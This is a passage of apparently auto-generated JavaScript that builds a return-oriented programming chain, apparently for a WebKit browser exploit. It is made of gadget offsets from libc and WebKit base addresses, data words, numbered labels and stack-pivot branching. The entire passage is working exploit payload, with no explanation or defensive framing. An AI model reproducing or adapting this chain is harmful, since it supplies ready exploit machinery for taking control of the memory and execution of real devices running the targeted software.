libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+430024, //L9108
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+430040, //L9109
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+429992, //L9106
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+430008, //L9107
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9106:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9107:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9108:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9109:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+430136, //L9111
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+430120, //L9110
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9110:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9111:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L9112:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L9113:
db([10, 0]); // 0xa
set_gadget(libc_base+763368,); //pop rcx
//L9114:
db([10, 0]); // 0xa
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+430336, //L9116
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9116:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+430392, //L9117
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9117:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+430528, //L9121
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+430512, //L9120
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9119:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L9120:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9121:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+430664, //L9124
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+430696, //L9126
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+430648, //L9123
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9123:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9124:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9125:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9126:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+430808, //L9127+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+430800, //L9127
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L9127:
db([0, 0]); // 0x0
set_gadgets([
ropchain+430824, //L9127+24
ropchain+431888, //L9122
libc_base+764760, //pop rsi
ropchain+430864, //L9128
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9128:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9130:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+430984, //L9133
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+430968, //L9131
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9131:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9133:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+431160, //L9136
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+431176, //L9137
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+431128, //L9134
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+431144, //L9135
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9134:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9135:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9136:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9137:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+431272, //L9139
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+431256, //L9138
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9138:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9139:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L9140:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L9141:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L9142:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+431480, //L9144
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L9143:
db([4294967295, 4294967295]); // 0xffffffffffffffff
set_gadget(libc_base+759608,); //pop rax
//L9144:
db([0, 0]); // 0x0
set_gadgets([
libc_base+847417, //xor rax, rsi ; sub rax, rsi
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+431544, //L9146
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9146:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+431600, //L9147
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9147:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+431736, //L9151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+431720, //L9150
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9149:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L9150:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9151:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+431800, //L9152
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9152:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9154:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+431880, //L9155
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9155:
db([0, 0]); // 0x0
//L9122:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+431928, //L9157
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9157:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9159:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+432048, //L9162
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+432032, //L9160
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9160:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9162:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+432128, //L9163
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+432144, //L9164
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9163:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9164:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+432304, //L9168
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+432272, //L9166
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+432288, //L9167
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9165:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L9166:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9167:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9168:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+432360, //L9170
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L9170:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+432488, //L9172
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+432504, //L9173
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+432472, //L9171
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9171:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9172:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9173:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+432664, //L9177
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+432632, //L9175
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+432648, //L9176
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9174:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L9175:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9176:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9177:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+432720, //L9179
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L9179:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+432848, //L9181
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+432864, //L9182
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+432832, //L9180
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9180:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9181:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9182:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+433024, //L9186
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+432992, //L9184
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+433008, //L9185
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9183:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L9184:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9185:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9186:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+433080, //L9188
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L9188:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+433208, //L9190
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+433224, //L9191
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+433192, //L9189
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9189:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9190:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9191:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+433304, //L9192
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+433320, //L9193
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9192:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9193:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+433416, //L9195
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+433400, //L9194
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9194:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9195:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+433496, //L9196
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9196:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9197:
db([105, 0]); // 0x69
set_gadget(libc_base+144605,); //pop rdi
//L9198:
db([105, 0]); // 0x69
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+433640, //L9199
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+433672, //L9201
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+433656, //L9200
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9199:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9200:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9201:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+433840, //L9203
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+433856, //L9204
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+433824, //L9202
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9202:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9203:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9204:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+434016, //L9209
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+434032, //L9210
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+433968, //L9206
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9206:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9207:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L9208:
db([1, 0]); // 0x1
set_gadget(webkit_base+3236123,); //pop r9
//L9209:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9210:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+434152, //L9211+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+434144, //L9211
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L9211:
db([0, 0]); // 0x0
set_gadgets([
ropchain+434168, //L9211+24
ropchain+436376, //L9205
libc_base+764760, //pop rsi
ropchain+434208, //L9212
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9212:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9214:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+434328, //L9217
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+434312, //L9215
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9215:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9217:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+434408, //L9218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+434424, //L9219
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9218:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9219:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+434584, //L9223
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+434552, //L9221
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+434568, //L9222
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9220:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L9221:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9222:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9223:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+434640, //L9225
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L9225:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+434768, //L9227
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+434784, //L9228
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+434752, //L9226
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9226:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9227:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9228:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+434944, //L9232
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+434912, //L9230
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+434928, //L9231
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9229:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L9230:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9231:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9232:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+435000, //L9234
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L9234:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+435128, //L9236
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+435144, //L9237
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+435112, //L9235
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9235:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9236:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9237:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+435304, //L9241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+435272, //L9239
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+435288, //L9240
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9238:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L9239:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9240:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9241:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+435360, //L9243
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L9243:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+435488, //L9245
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+435504, //L9246
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+435472, //L9244
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9244:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9245:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9246:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+435584, //L9247
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+435600, //L9248
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9247:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9248:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+435696, //L9250
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+435680, //L9249
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9249:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9250:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+435776, //L9251
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9251:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9252:
db([100, 0]); // 0x64
set_gadget(libc_base+144605,); //pop rdi
//L9253:
db([100, 0]); // 0x64
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+435920, //L9254
webkit_base+660161, //mov [rsi], rax ; mov al, 1
